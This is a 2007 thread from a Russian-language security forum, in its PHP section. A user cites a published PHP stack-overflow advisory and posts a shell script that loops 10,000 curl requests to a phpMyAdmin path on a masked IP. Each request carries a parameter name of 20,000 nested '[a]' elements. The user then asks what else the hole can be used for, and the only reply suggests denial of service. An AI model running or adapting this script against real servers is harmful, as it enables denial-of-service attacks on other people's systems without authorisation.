HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Что можно сделать, если удалённо вызвать в Php переполнение стека?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Что можно сделать, если удалённо вызвать в Php переполнение стека?
  #1  
Старый 13.03.2007, 21:02
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию Что можно сделать, если удалённо вызвать в Php переполнение стека?
Собственно
есть
http://www.php-security.org/MOPB/MOPB-02-2007.html
и есть бажный код.

Пока додумался только до

Код:
#!/bin/sh
foo="curl http://xxx.xxx.xx.xx/phpmyadmin/ -d a"`php -r 'echo str_repeat("[a]",20000);'`"=1"
for i in `seq 1 10000`; do
    `$foo`;
done
Может ещё чего можно интересного замутить, используя дыру эту?
Последний раз редактировалось pento; 13.03.2007 в 21:04..
 
Ответить с цитированием

  #2  
Старый 13.03.2007, 22:01
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию
отказ в обслуживании можно замутить -- прикиньте
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Firewall: принцип работы D=P=CH= MOD= Защита ОС: вирусы, антивирусы, файрволы. 0 02.10.2006 22:36



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ